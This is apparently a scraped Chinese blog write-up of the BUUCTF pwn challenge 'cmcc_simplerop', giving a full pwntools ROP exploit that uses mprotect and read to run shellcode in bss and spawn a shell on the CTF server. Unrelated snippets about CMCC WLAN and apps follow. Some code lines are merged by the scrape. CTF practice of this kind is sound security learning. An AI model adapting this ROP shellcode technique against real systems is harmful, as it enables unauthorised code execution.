BUUCTF cmcc_simplerop

news/2025/3/4 21:15:21/

cmcc_simplerop

由于网络安全课程需要,从本篇开始记录BUU的做题记录及wp
在这里插入图片描述
常规操作,拿到文件先检查,保护开得不多
在这里插入图片描述
ida查看,存在明显溢出,并且提示要使用ROP
在这里插入图片描述
利用pwndbg得到偏移量为0x20
在这里插入图片描述
找到了系统调用int 0x80

整理下思路,可以利用mprotect修改bss的权限,并生成shellcode,利用read函数往bss段写入shellcode并且执行,从而拿到shell

from pwn import *
p=remote('node4.buuoj.cn',29914)
#context.terminal = ['tmux', 'splitw', '-h']
elf=ELF('./simplerop')
main=0x08048E24
bss=0x080EB000
int_80h=0x080493e1
pop_eax=0x080bae06
pop_edx_ecx_ebx=0x0806e850
mprotect_addr=elf.sym['mprotect']
read_addr=elf.sym['read']shell=asm(shellcraft.sh())payload=b'a'*0x20
payload+=p32(mprotect_addr)
payload+=p32(pop_edx_ecx_ebx)
payload+=p32(bss)+p32(0x1000)+p32(0x7)
payload+=p32(read_addr)
payload+=p32(pop_edx_ecx_ebx)
payload+=p32(0)+p32(bss)+p32(0x30)
payload+=p32(bss)
p.sendline(payload)sleep(1)
p.sendline(shell)p.interactive()

http://www.ppmy.cn/news/447761.html

相关文章

cmcc

高级运维工程师 职位描述: 1、 负责服务器等设备的安装、调试及日常监控和运行维护 2、 在发生故障时,可到达现场并解决故障,编写维护档案以及与维护相关的文档/报告,负责项目现场实施所有技术支持工作 3、 负责数据备份与恢…

Linux 登录 帐号 cmccedu 无线,CMCC CMCC-EDU路由器绑定自动登录方法详细教程!

鄙视楼主 自己查了很多方法想实现CMCC CMCC-EDU路由器绑定自动登录,就是不需要电脑网站认证登录,路由器自己登录手机直接连接路由器信号直接上网! ps:设置后,路由器已发射出WIFI信号了,电脑不能连接只能通过网线链接LAN1---LAN4口上网,手机可以链接路由器发出的信号! (…

关于移动赠送的CMCC,能连接和登录,但登录后仍上不了网的问题

问题背景:本人因校园卡套餐拥有静态CMCC账号,一直以来使用都没问题。有一次因为重设了网络设置,对于其他正常拨号仍能上网,但CMCC代理能连接和登录成功却上不了网。 解决方案:internet选项——连接,找到已建…

xp连接cmcc-auto

部分WLAN热点SSID使用PEAP方式进行认证,需要使用PC通过这些SSID实现WLAN无线上网(本文以WinXP和使用PEAP方式进行认证的CMCC-AUTO为例)。 相关准备 获得WLAN PEAP认证帐号 操作步骤 1、打开操作系统无线网络连接,在弹出的无线网络…

java咪咕视频,咪咕视频(com.cmcc.cmvideo) - 5.8.9.50 - 应用 - 酷安

权限信息 连接WLAN网络和断开连接 创建帐户并设置密码 完全的网络访问权限 查看WLAN连接 查看网络连接 添加或移除帐户 读取手机状态和身份 查阅敏感日志数据 修改或删除您的USB存储设备中的内容 读取您的USB存储设备中的内容 com.android.launcher.permission.INST…

Linux下移动CMCC WLAN自动连接认证

山东移动的WLAN目前覆盖了很多居民区、公共场所和高校。价格低廉,速度尚可,普通网络应用绰绰有余,准备把家中的10M廉通宽带打入冷宫。 不过CMCC WLAN每次都要Web页认证比较麻烦。幸亏Linux系统的Network Manager有脚本钩子,可以很…

CMCC-Fota

所实话,CMCC的fota不是一般的烂,不过没有办法还是得测。 经过一轮一轮的轰炸,项目的DM的测试算是告一段落。其中出现了很多问题总结如下: 由于硬件上用的TAVOR P65 + NAND,所以在Fota的NAND的Driver上出现…